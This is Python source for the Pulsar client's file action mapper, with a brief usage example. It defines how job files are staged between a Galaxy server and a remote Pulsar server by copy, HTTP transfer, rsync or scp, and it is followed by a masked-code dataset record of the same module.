% url_base else: url_base = "%s&" % url_base url_params = urlencode({"path": action.path, "file_type": file_type}) action.url = f"{url_base}{url_params}" def __inject_ssh_properties(self, action): for attr in ["ssh_key", "ssh_host", "ssh_port", "ssh_user"]: action_attr = getattr(action, attr) if action_attr == UNSET_ACTION_KWD: client_default_attr = getattr(self, attr, None) setattr(action, attr, client_default_attr) if action.ssh_key is None: raise Exception(MISSING_SSH_KEY_ERROR) REQUIRED_ACTION_KWD = object() UNSET_ACTION_KWD = "__UNSET__" class BaseAction: whole_directory_transfer_supported = False action_spec: Dict[str, Any] = {} action_type: str def __init__(self, source, file_lister=None): self.source = source self.file_lister = file_lister or DEFAULT_FILE_LISTER @property def path(self): return self.source.get("path") def unstructured_map(self, path_helper): unstructured_map = self.file_lister.unstructured_map(self.path) if self.staging_needed: # To ensure uniqueness, prepend unique prefix to each name prefix = unique_path_prefix(self.path) for path, name in unstructured_map.items(): unstructured_map[path] = join(prefix, name) else: path_rewrites = {} for path in unstructured_map: rewrite = self.path_rewrite(path_helper, path) if rewrite: path_rewrites[path] = rewrite unstructured_map = path_rewrites return unstructured_map @property def staging_needed(self): return self.staging != STAGING_ACTION_NONE @property def staging_action_local(self): return self.staging == STAGING_ACTION_LOCAL def _extend_base_dict(self, **kwds): base_dict = dict( path=self.path, # For older Pulsar servers (pre-0.13.0?) source=self.source, action_type=self.action_type, ) base_dict.update(**kwds) return base_dict def to_dict(self): return self._extend_base_dict() def __str__(self): as_dict = self.to_dict() attribute_str = "" first = True for key, value in as_dict.items(): if key == "source": continue if first: first = False else: attribute_str += "," attribute_str += "{}={}".format(key, value) return "FileAction[%s]" % attribute_str class NoneAction(BaseAction): """ This action indicates the corresponding path does not require any additional action. This should indicate paths that are available both on the Pulsar client (i.e. Galaxy server) and remote Pulsar server with the same paths. """ action_type = "none" staging = STAGING_ACTION_NONE def to_dict(self): return self._extend_base_dict() @classmethod def from_dict(cls, action_dict): return NoneAction(source=action_dict["source"]) def path_rewrite(self, path_helper, path=None): return None class RewriteAction(BaseAction): """ This actin indicates the Pulsar server should simply rewrite the path to the specified file. 
""" action_spec = dict( source_directory=REQUIRED_ACTION_KWD, destination_directory=REQUIRED_ACTION_KWD ) action_type = "rewrite" staging = STAGING_ACTION_NONE def __init__(self, source, file_lister=None, source_directory=None, destination_directory=None): super().__init__(source, file_lister=file_lister) self.source_directory = source_directory self.destination_directory = destination_directory def to_dict(self): return self._extend_base_dict( source_directory=self.source_directory, destination_directory=self.destination_directory, ) @classmethod def from_dict(cls, action_dict): return RewriteAction( source=action_dict["source"], source_directory=action_dict["source_directory"], destination_directory=action_dict["destination_directory"], ) def path_rewrite(self, path_helper, path=None): if not path: path = self.path new_path = path_helper.from_posix_with_new_base(self.path, self.source_directory, self.destination_directory) return None if new_path == self.path else new_path class TransferAction(BaseAction): """ This actions indicates that the Pulsar client should initiate an HTTP transfer of the corresponding path to the remote Pulsar server before launching the job. """ action_type = "transfer" staging = STAGING_ACTION_LOCAL class CopyAction(BaseAction): """ This action indicates that the Pulsar client should execute a file system copy of the corresponding path to the Pulsar staging directory prior to launching the corresponding job. """ action_type = "copy" staging = STAGING_ACTION_LOCAL class RemoteCopyAction(BaseAction): """ This action indicates the Pulsar server should copy the file before execution via direct file system copy. This is like a CopyAction, but it indicates the action should occur on the Pulsar server instead of on the client. """ action_type = "remote_copy" staging = STAGING_ACTION_REMOTE @classmethod def from_dict(cls, action_dict): return RemoteCopyAction(source=action_dict["source"]) def write_to_path(self, path): copy_to_path(open(self.path, "rb"), path) def write_from_path(self, pulsar_path): destination = self.path parent_directory = dirname(destination) if not exists(parent_directory): makedirs(parent_directory) with open(pulsar_path, "rb") as f: copy_to_path(f, destination) class RemoteTransferAction(BaseAction): """ This action indicates the Pulsar server should transfer the file before execution via one of the remote transfer implementations. 
This is like a TransferAction, but it indicates the action requires network access to the staging server, and should be executed via ssh/rsync/etc """ inject_url = True action_type = "remote_transfer" staging = STAGING_ACTION_REMOTE def __init__(self, source, file_lister=None, url=None): super().__init__(source, file_lister=file_lister) self.url = url def to_dict(self): return self._extend_base_dict(url=self.url) @classmethod def from_dict(cls, action_dict): return RemoteTransferAction(source=action_dict["source"], url=action_dict["url"]) def write_to_path(self, path): get_file(self.url, path) def write_from_path(self, pulsar_path): post_file(self.url, pulsar_path) class RemoteObjectStoreCopyAction(BaseAction): """ """ action_type = "remote_object_store_copy" staging = STAGING_ACTION_REMOTE inject_object_store = True @classmethod def from_dict(cls, action_dict): return RemoteObjectStoreCopyAction(source=action_dict["source"]) def write_to_path(self, path): assert self.object_store # Make sure object_store attribute injected assert "object_store_ref" in self.source object_store_ref = self.source["object_store_ref"] dataset_object = Bunch( id=object_store_ref["dataset_id"], uuid=object_store_ref["dataset_uuid"], object_store_id=object_store_ref["object_store_id"], ) filename = self.object_store.get_filename(dataset_object) copy_to_path(open(filename, 'rb'), path) def write_from_path(self, pulsar_path): raise NotImplementedError("Writing raw files to object store not supported at this time.") class PubkeyAuthenticatedTransferAction(BaseAction): """Base class for file transfers requiring an SSH public/private key """ inject_ssh_properties = True action_spec = dict( ssh_key=UNSET_ACTION_KWD, ssh_user=UNSET_ACTION_KWD, ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ) staging = STAGING_ACTION_REMOTE def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD, ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=UNSET_ACTION_KWD): super().__init__(source, file_lister=file_lister) self.ssh_user = ssh_user self.ssh_host = ssh_host self.ssh_port = ssh_port self.ssh_key = ssh_key def to_dict(self): return self._extend_base_dict( ssh_user=self.ssh_user, ssh_host=self.ssh_host, ssh_port=self.ssh_port ) @contextmanager def _serialized_key(self): key_file = self.__serialize_ssh_key() yield key_file self.__cleanup_ssh_key(key_file) def __serialize_ssh_key(self): f = tempfile.NamedTemporaryFile(delete=False) if self.ssh_key is not None: f.write(self.ssh_key.encode("utf-8")) else: raise Exception("SSH_KEY not available") return f.name def __cleanup_ssh_key(self, keyfile): if exists(keyfile): unlink(keyfile) class RsyncTransferAction(PubkeyAuthenticatedTransferAction): action_type = "remote_rsync_transfer" @classmethod def from_dict(cls, action_dict): return RsyncTransferAction(source=action_dict["source"], ssh_user=action_dict["ssh_user"], ssh_host=action_dict["ssh_host"], ssh_port=action_dict["ssh_port"], ssh_key=action_dict["ssh_key"]) def write_to_path(self, path): with self._serialized_key() as key_file: rsync_get_file(self.path, path, self.ssh_user, self.ssh_host, self.ssh_port, key_file) def write_from_path(self, pulsar_path): with self._serialized_key() as key_file: rsync_post_file(pulsar_path, self.path, self.ssh_user, self.ssh_host, self.ssh_port, key_file) class ScpTransferAction(PubkeyAuthenticatedTransferAction): action_type = "remote_scp_transfer" @classmethod def from_dict(cls, action_dict): return ScpTransferAction(source=action_dict["source"], 
ssh_user=action_dict["ssh_user"], ssh_host=action_dict["ssh_host"], ssh_port=action_dict["ssh_port"], ssh_key=action_dict["ssh_key"]) def write_to_path(self, path): with self._serialized_key() as key_file: scp_get_file(self.path, path, self.ssh_user, self.ssh_host, self.ssh_port, key_file) def write_from_path(self, pulsar_path): with self._serialized_key() as key_file: scp_post_file(pulsar_path, self.path, self.ssh_user, self.ssh_host, self.ssh_port, key_file) class MessageAction: """ Sort of pseudo action describing "files" store in memory and transferred via message (HTTP, Python-call, MQ, etc...) """ action_type = "message" staging = STAGING_ACTION_DEFAULT def __init__(self, contents, client=None): self.contents = contents self.client = client @property def staging_needed(self): return True @property def staging_action_local(self): # Ekkk, cannot be called if created through from_dict. # Shouldn't be a problem the way it is used - but is an # object design problem. return self.client.prefer_local_staging def to_dict(self): return dict(contents=self.contents, action_type=MessageAction.action_type) @classmethod def from_dict(cls, action_dict): return MessageAction(contents=action_dict["contents"]) def write_to_path(self, path): open(path, "w").write(self.contents) DICTIFIABLE_ACTION_CLASSES = [ RemoteCopyAction, RemoteTransferAction, MessageAction, RsyncTransferAction, ScpTransferAction, RemoteObjectStoreCopyAction ] def from_dict(action_dict): action_type = action_dict.get("action_type", None) target_class = None for action_class in DICTIFIABLE_ACTION_CLASSES: if action_type == action_class.action_type: target_class = action_class if not target_class: message = "Failed to recover action from dictionary - invalid action type specified %s." % action_type raise Exception(message) if "source" in action_dict: action_dict.pop("path") # remove redundant information stored for backward compatibility. elif "path" in action_dict: # legacy message received from older Pulsar client, pop the path from the dict # and convert it to a source. 
source = {"path": action_dict.pop("path")} action_dict["source"] = source return target_class.from_dict(action_dict) class BasePathMapper: match_type: str def __init__(self, config): action_type = config.get('action', DEFAULT_MAPPED_ACTION) action_class = actions.get(action_type, None) action_kwds = action_class.action_spec.copy() for key, value in action_kwds.items(): if key in config: action_kwds[key] = config[key] elif value is REQUIRED_ACTION_KWD: message_template = "action_type %s requires key word argument %s" message = message_template % (action_type, key) raise Exception(message) else: action_kwds[key] = value self.action_type = action_type self.action_kwds = action_kwds path_types_str = config.get('path_types', "*defaults*") path_types_str = path_types_str.replace("*defaults*", ",".join(ACTION_DEFAULT_PATH_TYPES)) path_types_str = path_types_str.replace("*any*", ",".join(ALL_PATH_TYPES)) self.path_types = path_types_str.split(",") self.file_lister = FileLister(config) def matches(self, path, path_type): path_type_matches = path_type in self.path_types rval = path_type_matches and self._path_matches(path) return rval def _extend_base_dict(self, **kwds): base_dict = dict( action=self.action_type, path_types=",".join(self.path_types), match_type=self.match_type ) base_dict.update(self.file_lister.to_dict()) base_dict.update(self.action_kwds) base_dict.update(**kwds) return base_dict def to_pattern(self): raise NotImplementedError() class PathTypeOnlyMapper(BasePathMapper): match_type = 'path_type_only' def __init__(self, config): super().__init__(config) def _path_matches(self, path): return True def to_dict(self): return self._extend_base_dict() class PrefixPathMapper(BasePathMapper): match_type = 'prefix' def __init__(self, config): super().__init__(config) self.prefix_path = abspath(config['path']) def _path_matches(self, path): return path is not None and path.startswith(self.prefix_path) def to_pattern(self): pattern_str = r"({}{}[^\s,\"\']+)".format(escape(self.prefix_path), escape(sep)) return compile(pattern_str) def to_dict(self): return self._extend_base_dict(path=self.prefix_path) class GlobPathMapper(BasePathMapper): match_type = 'glob' def __init__(self, config): super().__init__(config) self.glob_path = config['path'] def _path_matches(self, path): return path is not None and fnmatch.fnmatch(path, self.glob_path) def to_pattern(self): return compile(fnmatch.translate(self.glob_path)) def to_dict(self): return self._extend_base_dict(path=self.glob_path) class RegexPathMapper(BasePathMapper): match_type = 'regex' def __init__(self, config): super().__init__(config) self.pattern_raw = config['path'] self.pattern = compile(self.pattern_raw) def _path_matches(self, path): return path is not None and self.pattern.match(path) is not None def to_pattern(self): return self.pattern def to_dict(self): return self._extend_base_dict(path=self.pattern_raw) MAPPER_CLASSES = [PathTypeOnlyMapper, PrefixPathMapper, GlobPathMapper, RegexPathMapper] MAPPER_CLASS_DICT = dict(map(lambda c: (c.match_type, c), MAPPER_CLASSES)) def mappers_from_dicts(mapper_def_list): return list(map(lambda m: _mappper_from_dict(m), mapper_def_list)) def _mappper_from_dict(mapper_dict): if "path" in mapper_dict: map_type = mapper_dict.get('match_type', DEFAULT_PATH_MAPPER_TYPE) else: map_type = 'path_type_only' return MAPPER_CLASS_DICT[map_type](mapper_dict) class FileLister: def __init__(self, config): self.depth = int(config.get("depth", "0")) def to_dict(self): return dict( depth=self.depth ) def 
unstructured_map(self, path): depth = self.depth if self.depth == 0: return {path: basename(path)} else: while depth > 0: path = dirname(path) depth -= 1 return {join(path, f): f for f in directory_files(path)} DEFAULT_FILE_LISTER = FileLister(dict(depth=0)) ACTION_CLASSES: List[Type[BaseAction]] = [ NoneAction, RewriteAction, TransferAction, CopyAction, RemoteCopyAction, RemoteTransferAction, RemoteObjectStoreCopyAction, RsyncTransferAction, ScpTransferAction, ] actions = {clazz.action_type: clazz for clazz in ACTION_CLASSES} __all__ = ( 'FileActionMapper', 'path_type', 'from_dict', 'MessageAction', 'RemoteTransferAction', # For testing )
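A minimal usage sketch of the FileActionMapper defined above. The import path pulsar.client.action_mapper is an assumption about where this module lives, and the ssh host, user, key, and dataset paths are placeholder values; the FileActionMapper constructor, its config keys, and the action() call are taken from the code above.

# Sketch only: the import path is assumed; adjust it to wherever this module is installed.
from pulsar.client.action_mapper import FileActionMapper

# Paths under /opt/galaxy are assumed to exist on both sides, so they need no staging;
# datasets under /galaxy/data are pushed to the remote Pulsar server over rsync.
config = {
    "default_action": "none",
    "paths": [
        {"path": "/opt/galaxy", "action": "none"},
        {"path": "/galaxy/data", "action": "remote_rsync_transfer",
         "ssh_user": "pulsar", "ssh_host": "pulsar.example.org", "ssh_port": 22,
         "ssh_key": "<private key contents>"},
    ],
}

mapper = FileActionMapper(config=config)

action = mapper.action({"path": "/galaxy/data/files/000/dataset_1.dat"}, "input")
print(action.action_type)     # remote_rsync_transfer
print(action.staging_needed)  # True

# The mapper serializes to a plain dict and can be rebuilt from it.
rebuilt = FileActionMapper(config=mapper.to_dict())

Path rules are checked in order and the first match wins, so when prefixes overlap the more specific rule should be listed before the broader one.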
normal
{ "blob_id": "1a5c189b9a2bed35fbbb7df40ec80a1d02402d7f", "index": 6860, "step-1": "<mask token>\n\n\nclass TransferAction(BaseAction):\n <mask token>\n action_type = 'transfer'\n staging = STAGING_ACTION_LOCAL\n\n\nclass CopyAction(BaseAction):\n \"\"\" This action indicates that the Pulsar client should execute a file system\n copy of the corresponding path to the Pulsar staging directory prior to\n launching the corresponding job. \"\"\"\n action_type = 'copy'\n staging = STAGING_ACTION_LOCAL\n\n\nclass RemoteCopyAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should copy the file before\n execution via direct file system copy. This is like a CopyAction, but\n it indicates the action should occur on the Pulsar server instead of on\n the client.\n \"\"\"\n action_type = 'remote_copy'\n staging = STAGING_ACTION_REMOTE\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n copy_to_path(open(self.path, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n destination = self.path\n parent_directory = dirname(destination)\n if not exists(parent_directory):\n makedirs(parent_directory)\n with open(pulsar_path, 'rb') as f:\n copy_to_path(f, destination)\n\n\nclass RemoteTransferAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should transfer the file before\n execution via one of the remote transfer implementations. This is like a TransferAction, but\n it indicates the action requires network access to the staging server, and\n should be executed via ssh/rsync/etc\n \"\"\"\n inject_url = True\n action_type = 'remote_transfer'\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, url=None):\n super().__init__(source, file_lister=file_lister)\n self.url = url\n\n def to_dict(self):\n return self._extend_base_dict(url=self.url)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteTransferAction(source=action_dict['source'], url=\n action_dict['url'])\n\n def write_to_path(self, path):\n get_file(self.url, path)\n\n def write_from_path(self, pulsar_path):\n post_file(self.url, pulsar_path)\n\n\nclass RemoteObjectStoreCopyAction(BaseAction):\n \"\"\"\n \"\"\"\n action_type = 'remote_object_store_copy'\n staging = STAGING_ACTION_REMOTE\n inject_object_store = True\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteObjectStoreCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n assert self.object_store\n assert 'object_store_ref' in self.source\n object_store_ref = self.source['object_store_ref']\n dataset_object = Bunch(id=object_store_ref['dataset_id'], uuid=\n object_store_ref['dataset_uuid'], object_store_id=\n object_store_ref['object_store_id'])\n filename = self.object_store.get_filename(dataset_object)\n copy_to_path(open(filename, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n raise NotImplementedError(\n 'Writing raw files to object store not supported at this time.')\n\n\nclass PubkeyAuthenticatedTransferAction(BaseAction):\n \"\"\"Base class for file transfers requiring an SSH public/private key\n \"\"\"\n inject_ssh_properties = True\n action_spec = dict(ssh_key=UNSET_ACTION_KWD, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD)\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=\n UNSET_ACTION_KWD):\n 
super().__init__(source, file_lister=file_lister)\n self.ssh_user = ssh_user\n self.ssh_host = ssh_host\n self.ssh_port = ssh_port\n self.ssh_key = ssh_key\n\n def to_dict(self):\n return self._extend_base_dict(ssh_user=self.ssh_user, ssh_host=self\n .ssh_host, ssh_port=self.ssh_port)\n\n @contextmanager\n def _serialized_key(self):\n key_file = self.__serialize_ssh_key()\n yield key_file\n self.__cleanup_ssh_key(key_file)\n\n def __serialize_ssh_key(self):\n f = tempfile.NamedTemporaryFile(delete=False)\n if self.ssh_key is not None:\n f.write(self.ssh_key.encode('utf-8'))\n else:\n raise Exception('SSH_KEY not available')\n return f.name\n\n def __cleanup_ssh_key(self, keyfile):\n if exists(keyfile):\n unlink(keyfile)\n\n\nclass RsyncTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_rsync_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return RsyncTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n rsync_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n rsync_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass ScpTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_scp_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return ScpTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n scp_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n scp_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass MessageAction:\n \"\"\" Sort of pseudo action describing \"files\" store in memory and\n transferred via message (HTTP, Python-call, MQ, etc...)\n \"\"\"\n action_type = 'message'\n staging = STAGING_ACTION_DEFAULT\n\n def __init__(self, contents, client=None):\n self.contents = contents\n self.client = client\n\n @property\n def staging_needed(self):\n return True\n\n @property\n def staging_action_local(self):\n return self.client.prefer_local_staging\n\n def to_dict(self):\n return dict(contents=self.contents, action_type=MessageAction.\n action_type)\n\n @classmethod\n def from_dict(cls, action_dict):\n return MessageAction(contents=action_dict['contents'])\n\n def write_to_path(self, path):\n open(path, 'w').write(self.contents)\n\n\n<mask token>\n\n\nclass BasePathMapper:\n match_type: str\n\n def __init__(self, config):\n action_type = config.get('action', DEFAULT_MAPPED_ACTION)\n action_class = actions.get(action_type, None)\n action_kwds = action_class.action_spec.copy()\n for key, value in action_kwds.items():\n if key in config:\n action_kwds[key] = config[key]\n elif value is REQUIRED_ACTION_KWD:\n message_template = (\n 'action_type %s requires key word argument %s')\n message = message_template % (action_type, key)\n raise Exception(message)\n else:\n action_kwds[key] = value\n self.action_type = action_type\n self.action_kwds = action_kwds\n path_types_str = 
config.get('path_types', '*defaults*')\n path_types_str = path_types_str.replace('*defaults*', ','.join(\n ACTION_DEFAULT_PATH_TYPES))\n path_types_str = path_types_str.replace('*any*', ','.join(\n ALL_PATH_TYPES))\n self.path_types = path_types_str.split(',')\n self.file_lister = FileLister(config)\n\n def matches(self, path, path_type):\n path_type_matches = path_type in self.path_types\n rval = path_type_matches and self._path_matches(path)\n return rval\n\n def _extend_base_dict(self, **kwds):\n base_dict = dict(action=self.action_type, path_types=','.join(self.\n path_types), match_type=self.match_type)\n base_dict.update(self.file_lister.to_dict())\n base_dict.update(self.action_kwds)\n base_dict.update(**kwds)\n return base_dict\n\n def to_pattern(self):\n raise NotImplementedError()\n\n\nclass PathTypeOnlyMapper(BasePathMapper):\n match_type = 'path_type_only'\n\n def __init__(self, config):\n super().__init__(config)\n\n def _path_matches(self, path):\n return True\n\n def to_dict(self):\n return self._extend_base_dict()\n\n\nclass PrefixPathMapper(BasePathMapper):\n match_type = 'prefix'\n\n def __init__(self, config):\n super().__init__(config)\n self.prefix_path = abspath(config['path'])\n\n def _path_matches(self, path):\n return path is not None and path.startswith(self.prefix_path)\n\n def to_pattern(self):\n pattern_str = '({}{}[^\\\\s,\\\\\"\\\\\\']+)'.format(escape(self.\n prefix_path), escape(sep))\n return compile(pattern_str)\n\n def to_dict(self):\n return self._extend_base_dict(path=self.prefix_path)\n\n\nclass GlobPathMapper(BasePathMapper):\n match_type = 'glob'\n\n def __init__(self, config):\n super().__init__(config)\n self.glob_path = config['path']\n\n def _path_matches(self, path):\n return path is not None and fnmatch.fnmatch(path, self.glob_path)\n\n def to_pattern(self):\n return compile(fnmatch.translate(self.glob_path))\n\n def to_dict(self):\n return self._extend_base_dict(path=self.glob_path)\n\n\nclass RegexPathMapper(BasePathMapper):\n match_type = 'regex'\n\n def __init__(self, config):\n super().__init__(config)\n self.pattern_raw = config['path']\n self.pattern = compile(self.pattern_raw)\n\n def _path_matches(self, path):\n return path is not None and self.pattern.match(path) is not None\n\n def to_pattern(self):\n return self.pattern\n\n def to_dict(self):\n return self._extend_base_dict(path=self.pattern_raw)\n\n\n<mask token>\n\n\nclass FileLister:\n\n def __init__(self, config):\n self.depth = int(config.get('depth', '0'))\n\n def to_dict(self):\n return dict(depth=self.depth)\n\n def unstructured_map(self, path):\n depth = self.depth\n if self.depth == 0:\n return {path: basename(path)}\n else:\n while depth > 0:\n path = dirname(path)\n depth -= 1\n return {join(path, f): f for f in directory_files(path)}\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass RewriteAction(BaseAction):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass TransferAction(BaseAction):\n \"\"\" This actions indicates that the Pulsar client should initiate an HTTP\n transfer of the corresponding path to the remote Pulsar server before\n launching the job. \"\"\"\n action_type = 'transfer'\n staging = STAGING_ACTION_LOCAL\n\n\nclass CopyAction(BaseAction):\n \"\"\" This action indicates that the Pulsar client should execute a file system\n copy of the corresponding path to the Pulsar staging directory prior to\n launching the corresponding job. 
\"\"\"\n action_type = 'copy'\n staging = STAGING_ACTION_LOCAL\n\n\nclass RemoteCopyAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should copy the file before\n execution via direct file system copy. This is like a CopyAction, but\n it indicates the action should occur on the Pulsar server instead of on\n the client.\n \"\"\"\n action_type = 'remote_copy'\n staging = STAGING_ACTION_REMOTE\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n copy_to_path(open(self.path, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n destination = self.path\n parent_directory = dirname(destination)\n if not exists(parent_directory):\n makedirs(parent_directory)\n with open(pulsar_path, 'rb') as f:\n copy_to_path(f, destination)\n\n\nclass RemoteTransferAction(BaseAction):\n \"\"\" This action indicates the Pulsar server should transfer the file before\n execution via one of the remote transfer implementations. This is like a TransferAction, but\n it indicates the action requires network access to the staging server, and\n should be executed via ssh/rsync/etc\n \"\"\"\n inject_url = True\n action_type = 'remote_transfer'\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, url=None):\n super().__init__(source, file_lister=file_lister)\n self.url = url\n\n def to_dict(self):\n return self._extend_base_dict(url=self.url)\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteTransferAction(source=action_dict['source'], url=\n action_dict['url'])\n\n def write_to_path(self, path):\n get_file(self.url, path)\n\n def write_from_path(self, pulsar_path):\n post_file(self.url, pulsar_path)\n\n\nclass RemoteObjectStoreCopyAction(BaseAction):\n \"\"\"\n \"\"\"\n action_type = 'remote_object_store_copy'\n staging = STAGING_ACTION_REMOTE\n inject_object_store = True\n\n @classmethod\n def from_dict(cls, action_dict):\n return RemoteObjectStoreCopyAction(source=action_dict['source'])\n\n def write_to_path(self, path):\n assert self.object_store\n assert 'object_store_ref' in self.source\n object_store_ref = self.source['object_store_ref']\n dataset_object = Bunch(id=object_store_ref['dataset_id'], uuid=\n object_store_ref['dataset_uuid'], object_store_id=\n object_store_ref['object_store_id'])\n filename = self.object_store.get_filename(dataset_object)\n copy_to_path(open(filename, 'rb'), path)\n\n def write_from_path(self, pulsar_path):\n raise NotImplementedError(\n 'Writing raw files to object store not supported at this time.')\n\n\nclass PubkeyAuthenticatedTransferAction(BaseAction):\n \"\"\"Base class for file transfers requiring an SSH public/private key\n \"\"\"\n inject_ssh_properties = True\n action_spec = dict(ssh_key=UNSET_ACTION_KWD, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD)\n staging = STAGING_ACTION_REMOTE\n\n def __init__(self, source, file_lister=None, ssh_user=UNSET_ACTION_KWD,\n ssh_host=UNSET_ACTION_KWD, ssh_port=UNSET_ACTION_KWD, ssh_key=\n UNSET_ACTION_KWD):\n super().__init__(source, file_lister=file_lister)\n self.ssh_user = ssh_user\n self.ssh_host = ssh_host\n self.ssh_port = ssh_port\n self.ssh_key = ssh_key\n\n def to_dict(self):\n return self._extend_base_dict(ssh_user=self.ssh_user, ssh_host=self\n .ssh_host, ssh_port=self.ssh_port)\n\n @contextmanager\n def _serialized_key(self):\n key_file = self.__serialize_ssh_key()\n yield key_file\n self.__cleanup_ssh_key(key_file)\n\n def 
__serialize_ssh_key(self):\n f = tempfile.NamedTemporaryFile(delete=False)\n if self.ssh_key is not None:\n f.write(self.ssh_key.encode('utf-8'))\n else:\n raise Exception('SSH_KEY not available')\n return f.name\n\n def __cleanup_ssh_key(self, keyfile):\n if exists(keyfile):\n unlink(keyfile)\n\n\nclass RsyncTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_rsync_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return RsyncTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n rsync_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n rsync_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass ScpTransferAction(PubkeyAuthenticatedTransferAction):\n action_type = 'remote_scp_transfer'\n\n @classmethod\n def from_dict(cls, action_dict):\n return ScpTransferAction(source=action_dict['source'], ssh_user=\n action_dict['ssh_user'], ssh_host=action_dict['ssh_host'],\n ssh_port=action_dict['ssh_port'], ssh_key=action_dict['ssh_key'])\n\n def write_to_path(self, path):\n with self._serialized_key() as key_file:\n scp_get_file(self.path, path, self.ssh_user, self.ssh_host,\n self.ssh_port, key_file)\n\n def write_from_path(self, pulsar_path):\n with self._serialized_key() as key_file:\n scp_post_file(pulsar_path, self.path, self.ssh_user, self.\n ssh_host, self.ssh_port, key_file)\n\n\nclass MessageAction:\n \"\"\" Sort of pseudo action describing \"files\" store in memory and\n transferred via message (HTTP, Python-call, MQ, etc...)\n \"\"\"\n action_type = 'message'\n staging = STAGING_ACTION_DEFAULT\n\n def __init__(self, contents, client=None):\n self.contents = contents\n self.client = client\n\n @property\n def staging_needed(self):\n return True\n\n @property\n def staging_action_local(self):\n return self.client.prefer_local_staging\n\n def to_dict(self):\n return dict(contents=self.contents, action_type=MessageAction.\n action_type)\n\n @classmethod\n def from_dict(cls, action_dict):\n return MessageAction(contents=action_dict['contents'])\n\n def write_to_path(self, path):\n open(path, 'w').write(self.contents)\n\n\n<mask token>\n\n\nclass BasePathMapper:\n match_type: str\n\n def __init__(self, config):\n action_type = config.get('action', DEFAULT_MAPPED_ACTION)\n action_class = actions.get(action_type, None)\n action_kwds = action_class.action_spec.copy()\n for key, value in action_kwds.items():\n if key in config:\n action_kwds[key] = config[key]\n elif value is REQUIRED_ACTION_KWD:\n message_template = (\n 'action_type %s requires key word argument %s')\n message = message_template % (action_type, key)\n raise Exception(message)\n else:\n action_kwds[key] = value\n self.action_type = action_type\n self.action_kwds = action_kwds\n path_types_str = config.get('path_types', '*defaults*')\n path_types_str = path_types_str.replace('*defaults*', ','.join(\n ACTION_DEFAULT_PATH_TYPES))\n path_types_str = path_types_str.replace('*any*', ','.join(\n ALL_PATH_TYPES))\n self.path_types = path_types_str.split(',')\n self.file_lister = FileLister(config)\n\n def matches(self, path, path_type):\n path_type_matches = path_type in self.path_types\n rval = path_type_matches and 
